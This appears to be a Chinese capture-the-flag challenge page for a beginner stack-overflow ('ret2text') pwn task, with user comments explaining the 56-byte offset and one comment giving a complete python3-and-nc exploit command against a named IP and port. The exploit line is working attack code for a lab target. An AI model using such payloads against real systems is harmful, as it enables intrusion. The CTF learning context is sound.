overflowPWN 未解决

分数: 20 金币: 4
题目作者: harry
一  血: blanc
一血奖励: 1金币
解  决: 1916
提  示:
描  述:
pwn2
其  他: 下载
评论
modeng 28天前

这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502

回复 0

王安小子 1月前

python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok

回复 0

乌鸦乌鸦乌鸦乌鸦 5月前

为什么答案是56字节,我测出来是40字节

回复 0
scust 5月前

看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节

回复 0

weiyouzhunze 7月前

栈溢出漏洞利用

回复 0

afag 8月前

0x30+8填充

回复 0

17773146280 9月前

简单的ret2text题目,后门函数地址加上缓冲区长度就可以了

回复 0

YellowZy 1年前

应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充

回复 0

255a 1年前

修改main函数返回地址的rcx的值

回复 0

da111sy 1年前

https://zaoganmaqule.github.io/2024/08/21/bugku-ctf%E7%9A%84pwn%E9%A2%98%E8%A7%A3/#more

回复 4
puppet 1年前

能看见这么多题解真好

回复 0

xiaobai568 1年前

利用后门函数获取flag

回复 0

WriteUp

image
Leuslu

9 金币

评分(1)

解题动态

NEIL. 攻破了该题 1天前
20230302203 攻破了该题 2天前
20230302248 攻破了该题 3天前
Kris_zhk 攻破了该题 4天前
Mixt 攻破了该题 4天前
GuQing 攻破了该题 4天前
walt 攻破了该题 7天前
test_me 攻破了该题 7天前
zhaowenxin 攻破了该题 9天前
20230302227 攻破了该题 9天前
YANGLINSHENG2503940126 攻破了该题 10天前
叶... 攻破了该题 10天前
kesens 攻破了该题 10天前
星星月亮 攻破了该题 10天前
淋༲ 攻破了该题 10天前
LKY111mcrla 攻破了该题 10天前
A10ng 攻破了该题 11天前
20230302229 攻破了该题 12天前
本村无敌手 攻破了该题 12天前
13242465227 攻破了该题 12天前
问题反馈